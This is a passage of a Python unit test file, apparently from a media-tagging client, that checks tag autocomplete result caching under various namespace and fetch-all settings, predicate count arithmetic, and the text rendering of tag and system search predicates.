namespace_bare_fetch_all_allowed,
namespace_fetch_all_allowed,
fetch_all_allowed
)
pat_empty = ClientSearch.ParsedAutocompleteText( '', tag_autocomplete_options, True )
pat_samus = ClientSearch.ParsedAutocompleteText( 'samus', tag_autocomplete_options, True )
pat_samus_ar = ClientSearch.ParsedAutocompleteText( 'samus ar', tag_autocomplete_options, True )
pat_samus_br = ClientSearch.ParsedAutocompleteText( 'samus br', tag_autocomplete_options, True )
pat_character_samus = ClientSearch.ParsedAutocompleteText( 'character:samus', tag_autocomplete_options, True )
pat_character_samus_ar = ClientSearch.ParsedAutocompleteText( 'character:samus ar', tag_autocomplete_options, True )
pat_character_samus_br = ClientSearch.ParsedAutocompleteText( 'character:samus br', tag_autocomplete_options, True )
pat_metroid = ClientSearch.ParsedAutocompleteText( 'metroid', tag_autocomplete_options, True )
pat_series_samus = ClientSearch.ParsedAutocompleteText( 'series:samus', tag_autocomplete_options, True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_empty, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_empty, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_ar, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_ar, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus, True ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus, False ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_ar, True ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_ar, False ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_br, True ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_br, False ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_metroid, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_metroid, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_series_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_series_samus, False ), False )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'character:samus' ) ), { character_samus_aran } )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'character:samus*' ) ), { character_samus_aran } )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'character:samus ar*' ) ), { character_samus_aran } )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'character:samus br*' ) ), set() )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'character:samus aran*' ) ), { character_samus_aran } )
def test_predicate_results_cache_namespaces_into_full_tags( self ):
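# the cache is built from the unnamespaced prefix 'char': it only starts serving 'character:' subqueries once search_namespaces_into_full_tags is enabled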
tag_autocomplete_options = ClientTagsHandling.TagAutocompleteOptions( CC.COMBINED_TAG_SERVICE_KEY )
search_namespaces_into_full_tags = False
namespace_bare_fetch_all_allowed = False
namespace_fetch_all_allowed = False
fetch_all_allowed = False
tag_autocomplete_options.SetTuple(
tag_autocomplete_options.GetWriteAutocompleteTagDomain(),
tag_autocomplete_options.OverridesWriteAutocompleteFileDomain(),
tag_autocomplete_options.GetWriteAutocompleteFileDomain(),
search_namespaces_into_full_tags,
namespace_bare_fetch_all_allowed,
namespace_fetch_all_allowed,
fetch_all_allowed
)
pat_empty = ClientSearch.ParsedAutocompleteText( '', tag_autocomplete_options, True )
pat_samus = ClientSearch.ParsedAutocompleteText( 'samus', tag_autocomplete_options, True )
pat_samus_ar = ClientSearch.ParsedAutocompleteText( 'samus ar', tag_autocomplete_options, True )
pat_samus_br = ClientSearch.ParsedAutocompleteText( 'samus br', tag_autocomplete_options, True )
pat_character_samus = ClientSearch.ParsedAutocompleteText( 'character:samus', tag_autocomplete_options, True )
pat_character_samus_ar = ClientSearch.ParsedAutocompleteText( 'character:samus ar', tag_autocomplete_options, True )
pat_character_samus_br = ClientSearch.ParsedAutocompleteText( 'character:samus br', tag_autocomplete_options, True )
pat_metroid = ClientSearch.ParsedAutocompleteText( 'metroid', tag_autocomplete_options, True )
pat_series_samus = ClientSearch.ParsedAutocompleteText( 'series:samus', tag_autocomplete_options, True )
samus = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'samus' )
samus_aran = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'samus aran' )
character_samus_aran = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'character:samus aran' )
predicates = [ character_samus_aran ]
predicate_results_cache = ClientSearch.PredicateResultsCacheTag( predicates, 'char', False )
self.assertEqual( predicate_results_cache.GetPredicates(), predicates )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_empty, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_empty, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_ar, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_ar, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_ar, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_ar, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_br, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_br, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_metroid, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_metroid, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_series_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_series_samus, False ), False )
#
search_namespaces_into_full_tags = True
namespace_bare_fetch_all_allowed = True
namespace_fetch_all_allowed = True
fetch_all_allowed = False
tag_autocomplete_options.SetTuple(
tag_autocomplete_options.GetWriteAutocompleteTagDomain(),
tag_autocomplete_options.OverridesWriteAutocompleteFileDomain(),
tag_autocomplete_options.GetWriteAutocompleteFileDomain(),
search_namespaces_into_full_tags,
namespace_bare_fetch_all_allowed,
namespace_fetch_all_allowed,
fetch_all_allowed
)
pat_empty = ClientSearch.ParsedAutocompleteText( '', tag_autocomplete_options, True )
pat_samus = ClientSearch.ParsedAutocompleteText( 'samus', tag_autocomplete_options, True )
pat_samus_ar = ClientSearch.ParsedAutocompleteText( 'samus ar', tag_autocomplete_options, True )
pat_samus_br = ClientSearch.ParsedAutocompleteText( 'samus br', tag_autocomplete_options, True )
pat_character_samus = ClientSearch.ParsedAutocompleteText( 'character:samus', tag_autocomplete_options, True )
pat_character_samus_ar = ClientSearch.ParsedAutocompleteText( 'character:samus ar', tag_autocomplete_options, True )
pat_character_samus_br = ClientSearch.ParsedAutocompleteText( 'character:samus br', tag_autocomplete_options, True )
pat_metroid = ClientSearch.ParsedAutocompleteText( 'metroid', tag_autocomplete_options, True )
pat_series_samus = ClientSearch.ParsedAutocompleteText( 'series:samus', tag_autocomplete_options, True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_empty, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_empty, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_ar, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_ar, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus, True ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus, False ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_ar, True ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_ar, False ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_br, True ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_br, False ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_metroid, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_metroid, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_series_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_series_samus, False ), False )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'character:samus' ) ), { character_samus_aran } )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'character:samus*' ) ), { character_samus_aran } )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'character:samus ar*' ) ), { character_samus_aran } )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'character:samus br*' ) ), set() )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'character:samus aran*' ) ), { character_samus_aran } )
def test_predicate_results_cache_fetch_all_madness( self ):
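# the cache is built from a total '*' fetch-all: it serves nothing under the default options, but serves every input (including the empty string) once fetch_all_allowed is enabled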
tag_autocomplete_options = ClientTagsHandling.TagAutocompleteOptions( CC.COMBINED_TAG_SERVICE_KEY )
search_namespaces_into_full_tags = False
namespace_bare_fetch_all_allowed = False
namespace_fetch_all_allowed = False
fetch_all_allowed = False
tag_autocomplete_options.SetTuple(
tag_autocomplete_options.GetWriteAutocompleteTagDomain(),
tag_autocomplete_options.OverridesWriteAutocompleteFileDomain(),
tag_autocomplete_options.GetWriteAutocompleteFileDomain(),
search_namespaces_into_full_tags,
namespace_bare_fetch_all_allowed,
namespace_fetch_all_allowed,
fetch_all_allowed
)
pat_empty = ClientSearch.ParsedAutocompleteText( '', tag_autocomplete_options, True )
pat_samus = ClientSearch.ParsedAutocompleteText( 'samus', tag_autocomplete_options, True )
pat_samus_ar = ClientSearch.ParsedAutocompleteText( 'samus ar', tag_autocomplete_options, True )
pat_samus_br = ClientSearch.ParsedAutocompleteText( 'samus br', tag_autocomplete_options, True )
pat_character_samus = ClientSearch.ParsedAutocompleteText( 'character:samus', tag_autocomplete_options, True )
pat_character_samus_ar = ClientSearch.ParsedAutocompleteText( 'character:samus ar', tag_autocomplete_options, True )
pat_character_samus_br = ClientSearch.ParsedAutocompleteText( 'character:samus br', tag_autocomplete_options, True )
pat_metroid = ClientSearch.ParsedAutocompleteText( 'metroid', tag_autocomplete_options, True )
pat_series_samus = ClientSearch.ParsedAutocompleteText( 'series:samus', tag_autocomplete_options, True )
samus = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'samus' )
samus_aran = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'samus aran' )
character_samus_aran = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'character:samus aran' )
predicates = [ samus, samus_aran, character_samus_aran ]
predicate_results_cache = ClientSearch.PredicateResultsCacheTag( predicates, '*', False )
self.assertEqual( predicate_results_cache.GetPredicates(), predicates )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_empty, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_empty, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_ar, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_ar, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_ar, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_ar, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_br, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_br, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_metroid, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_metroid, False ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_series_samus, True ), False )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_series_samus, False ), False )
#
search_namespaces_into_full_tags = True
namespace_bare_fetch_all_allowed = True
namespace_fetch_all_allowed = True
fetch_all_allowed = True
tag_autocomplete_options.SetTuple(
tag_autocomplete_options.GetWriteAutocompleteTagDomain(),
tag_autocomplete_options.OverridesWriteAutocompleteFileDomain(),
tag_autocomplete_options.GetWriteAutocompleteFileDomain(),
search_namespaces_into_full_tags,
namespace_bare_fetch_all_allowed,
namespace_fetch_all_allowed,
fetch_all_allowed
)
pat_empty = ClientSearch.ParsedAutocompleteText( '', tag_autocomplete_options, True )
pat_samus = ClientSearch.ParsedAutocompleteText( 'samus', tag_autocomplete_options, True )
pat_samus_ar = ClientSearch.ParsedAutocompleteText( 'samus ar', tag_autocomplete_options, True )
pat_samus_br = ClientSearch.ParsedAutocompleteText( 'samus br', tag_autocomplete_options, True )
pat_character_samus = ClientSearch.ParsedAutocompleteText( 'character:samus', tag_autocomplete_options, True )
pat_character_samus_ar = ClientSearch.ParsedAutocompleteText( 'character:samus ar', tag_autocomplete_options, True )
pat_character_samus_br = ClientSearch.ParsedAutocompleteText( 'character:samus br', tag_autocomplete_options, True )
pat_metroid = ClientSearch.ParsedAutocompleteText( 'metroid', tag_autocomplete_options, True )
pat_series_samus = ClientSearch.ParsedAutocompleteText( 'series:samus', tag_autocomplete_options, True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_empty, True ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_empty, False ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus, True ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus, False ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_ar, True ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_samus_ar, False ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus, True ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus, False ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_ar, True ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_ar, False ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_br, True ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_character_samus_br, False ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_metroid, True ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_metroid, False ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_series_samus, True ), True )
self.assertEqual( predicate_results_cache.CanServeTagResults( pat_series_samus, False ), True )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'character:samus' ) ), { character_samus_aran } )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'character:samus*' ) ), { character_samus_aran } )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'character:samus ar*' ) ), { character_samus_aran } )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'character:samus br*' ) ), set() )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'character:samus aran*' ) ), { character_samus_aran } )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'samus' ) ), { samus, samus_aran, character_samus_aran } )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'samus*' ) ), { samus, samus_aran, character_samus_aran } )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'samas br*' ) ), set() )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'samus ar*' ) ), { samus_aran, character_samus_aran } )
self.assertEqual( set( predicate_results_cache.FilterPredicates( CC.COMBINED_TAG_SERVICE_KEY, 'samus aran*' ) ), { samus_aran, character_samus_aran } )
def test_predicate_counts( self ):
# quick test for counts and __hash__
p_c = ClientSearch.PredicateCount( 1, 2, 3, 4 )
self.assertEqual( p_c.min_current_count, 1 )
self.assertEqual( p_c.min_pending_count, 2 )
self.assertEqual( p_c.max_current_count, 3 )
self.assertEqual( p_c.max_pending_count, 4 )
self.assertNotEqual( p_c, ClientSearch.PredicateCount( 1, 2, 3, 5 ) )
self.assertNotEqual( p_c, ClientSearch.PredicateCount( 1, 5, 3, 4 ) )
self.assertEqual( p_c, ClientSearch.PredicateCount( 1, 2, 3, 4 ) )
#
null = ClientSearch.PredicateCount.STATICCreateNullCount()
self.assertEqual( null, ClientSearch.PredicateCount( 0, 0, 0, 0 ) )
self.assertEqual( null.GetMinCount(), 0 )
self.assertEqual( null.GetMinCount( HC.CONTENT_STATUS_CURRENT ), 0 )
self.assertEqual( null.GetMinCount( HC.CONTENT_STATUS_PENDING ), 0 )
self.assertEqual( null.HasZeroCount(), True )
self.assertEqual( null.HasNonZeroCount(), False )
self.assertEqual( null.GetSuffixString(), '' )
#
p_c = ClientSearch.PredicateCount( 3, 0, 3, 0 )
self.assertEqual( p_c, ClientSearch.PredicateCount( 3, 0, 3, 0 ) )
self.assertEqual( p_c.GetMinCount(), 3 )
self.assertEqual( p_c.GetMinCount( HC.CONTENT_STATUS_CURRENT ), 3 )
self.assertEqual( p_c.GetMinCount( HC.CONTENT_STATUS_PENDING ), 0 )
self.assertEqual( p_c.HasZeroCount(), False )
self.assertEqual( p_c.HasNonZeroCount(), True )
self.assertEqual( p_c.GetSuffixString(), '(3)' )
#
p_c = ClientSearch.PredicateCount( 0, 5, 0, 5 )
self.assertEqual( p_c, ClientSearch.PredicateCount( 0, 5, 0, 5 ) )
self.assertEqual( p_c.GetMinCount(), 5 )
self.assertEqual( p_c.GetMinCount( HC.CONTENT_STATUS_CURRENT ), 0 )
self.assertEqual( p_c.GetMinCount( HC.CONTENT_STATUS_PENDING ), 5 )
self.assertEqual( p_c.HasZeroCount(), False )
self.assertEqual( p_c.HasNonZeroCount(), True )
self.assertEqual( p_c.GetSuffixString(), '(+5)' )
#
p_c = ClientSearch.PredicateCount( 100, 0, 150, 0 )
self.assertEqual( p_c, ClientSearch.PredicateCount( 100, 0, 150, 0 ) )
self.assertEqual( p_c.GetMinCount(), 100 )
self.assertEqual( p_c.GetMinCount( HC.CONTENT_STATUS_CURRENT ), 100 )
self.assertEqual( p_c.GetMinCount( HC.CONTENT_STATUS_PENDING ), 0 )
self.assertEqual( p_c.HasZeroCount(), False )
self.assertEqual( p_c.HasNonZeroCount(), True )
self.assertEqual( p_c.GetSuffixString(), '(100-150)' )
#
p_c = ClientSearch.PredicateCount( 0, 80, 0, 85 )
self.assertEqual( p_c, ClientSearch.PredicateCount( 0, 80, 0, 85 ) )
self.assertEqual( p_c.GetMinCount(), 80 )
self.assertEqual( p_c.GetMinCount( HC.CONTENT_STATUS_CURRENT ), 0 )
self.assertEqual( p_c.GetMinCount( HC.CONTENT_STATUS_PENDING ), 80 )
self.assertEqual( p_c.HasZeroCount(), False )
self.assertEqual( p_c.HasNonZeroCount(), True )
self.assertEqual( p_c.GetSuffixString(), '(+80-85)' )
#
p_c = ClientSearch.PredicateCount( 0, 0, 1500, 0 )
self.assertEqual( p_c, ClientSearch.PredicateCount( 0, 0, 1500, 0 ) )
self.assertEqual( p_c.GetMinCount(), 0 )
self.assertEqual( p_c.GetMinCount( HC.CONTENT_STATUS_CURRENT ), 0 )
self.assertEqual( p_c.GetMinCount( HC.CONTENT_STATUS_PENDING ), 0 )
self.assertEqual( p_c.HasZeroCount(), False )
self.assertEqual( p_c.HasNonZeroCount(), True )
self.assertEqual( p_c.GetSuffixString(), '(0-1,500)' )
#
p_c = ClientSearch.PredicateCount( 1, 2, 3, 4 )
self.assertEqual( p_c, ClientSearch.PredicateCount( 1, 2, 3, 4 ) )
self.assertEqual( p_c.GetMinCount(), 3 )
self.assertEqual( p_c.GetMinCount( HC.CONTENT_STATUS_CURRENT ), 1 )
self.assertEqual( p_c.GetMinCount( HC.CONTENT_STATUS_PENDING ), 2 )
self.assertEqual( p_c.HasZeroCount(), False )
self.assertEqual( p_c.HasNonZeroCount(), True )
self.assertEqual( p_c.GetSuffixString(), '(1-3) (+2-4)' )
#
p_c_1 = ClientSearch.PredicateCount( 10, 2, 12, 4 )
p_c_2 = ClientSearch.PredicateCount( 1, 0, 2, 4 )
p_c_1.AddCounts( p_c_2 )
self.assertEqual( p_c_1, ClientSearch.PredicateCount( 10, 2, 14, 8 ) )
def test_predicate_strings_and_namespaces( self ):
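# check ToString, GetNamespace, and GetTextsAndNamespaces rendering for tag, system, namespace, wildcard, parent, and OR predicates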
render_for_user = False
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'tag' )
self.assertEqual( p.ToString(), 'tag' )
self.assertEqual( p.GetNamespace(), '' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'tag', True, count = ClientSearch.PredicateCount.STATICCreateStaticCount( 1, 2 ) )
self.assertEqual( p.ToString( with_count = False ), 'tag' )
self.assertEqual( p.ToString( with_count = True ), 'tag (1) (+2)' )
self.assertEqual( p.GetNamespace(), '' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'tag', False )
self.assertEqual( p.ToString(), '-tag' )
self.assertEqual( p.GetNamespace(), '' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'tag', False, count = ClientSearch.PredicateCount.STATICCreateStaticCount( 1, 2 ) )
self.assertEqual( p.ToString( with_count = False ), '-tag' )
self.assertEqual( p.ToString( with_count = True ), '-tag (1) (+2)' )
self.assertEqual( p.GetNamespace(), '' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
#
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_AGE, ( '<', 'delta', ( 1, 2, 3, 4 ) ) )
self.assertEqual( p.ToString(), 'system:import time: since 1 year 2 months ago' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_AGE, ( CC.UNICODE_ALMOST_EQUAL_TO, 'delta', ( 1, 2, 3, 4 ) ) )
self.assertEqual( p.ToString(), 'system:import time: around 1 year 2 months ago' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_AGE, ( '>', 'delta', ( 1, 2, 3, 4 ) ) )
self.assertEqual( p.ToString(), 'system:import time: before 1 year 2 months ago' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_ARCHIVE, count = ClientSearch.PredicateCount.STATICCreateCurrentCount( 1000 ) )
self.assertEqual( p.ToString(), 'system:archive (1,000)' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_DURATION, ( '<', 200 ) )
self.assertEqual( p.ToString(), 'system:duration < 200 milliseconds' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_EVERYTHING, count = ClientSearch.PredicateCount.STATICCreateCurrentCount( 2000 ) )
self.assertEqual( p.ToString(), 'system:everything (2,000)' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_FILE_SERVICE, ( True, HC.CONTENT_STATUS_CURRENT, CC.LOCAL_FILE_SERVICE_KEY ) )
self.assertEqual( p.ToString(), 'system:is currently in my files' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_FILE_SERVICE, ( True, HC.CONTENT_STATUS_DELETED, CC.LOCAL_FILE_SERVICE_KEY ) )
self.assertEqual( p.ToString(), 'system:is deleted from my files' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_FILE_SERVICE, ( False, HC.CONTENT_STATUS_PENDING, CC.LOCAL_FILE_SERVICE_KEY ) )
self.assertEqual( p.ToString(), 'system:is not pending to my files' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_FILE_SERVICE, ( False, HC.CONTENT_STATUS_PETITIONED, CC.LOCAL_FILE_SERVICE_KEY ) )
self.assertEqual( p.ToString(), 'system:is not petitioned from my files' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_HAS_AUDIO, True )
self.assertEqual( p.ToString(), 'system:has audio' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_HAS_AUDIO, False )
self.assertEqual( p.ToString(), 'system:no audio' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_HAS_ICC_PROFILE, True )
self.assertEqual( p.ToString(), 'system:has icc profile' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_HAS_ICC_PROFILE, False )
self.assertEqual( p.ToString(), 'system:no icc profile' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_HASH, ( ( bytes.fromhex( 'abcd' ), ), 'sha256' ) )
self.assertEqual( p.ToString(), 'system:sha256 hash is abcd' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_HEIGHT, ( '<', 2000 ) )
self.assertEqual( p.ToString(), 'system:height < 2,000' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_INBOX, count = ClientSearch.PredicateCount.STATICCreateCurrentCount( 1000 ) )
self.assertEqual( p.ToString(), 'system:inbox (1,000)' )
self.assertEqual( p.GetNamespace(), 'system' )
self.assertEqual( p.GetTextsAndNamespaces( render_for_user ), [ ( p.ToString(), p.GetNamespace() ) ] )
p = ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_SYSTEM_LIMIT, 2000 )
self.assertEqual( p.ToString(), 'system:limit is 2,000' )
self.assertEqual( p.GetNamespace(), 'system' )
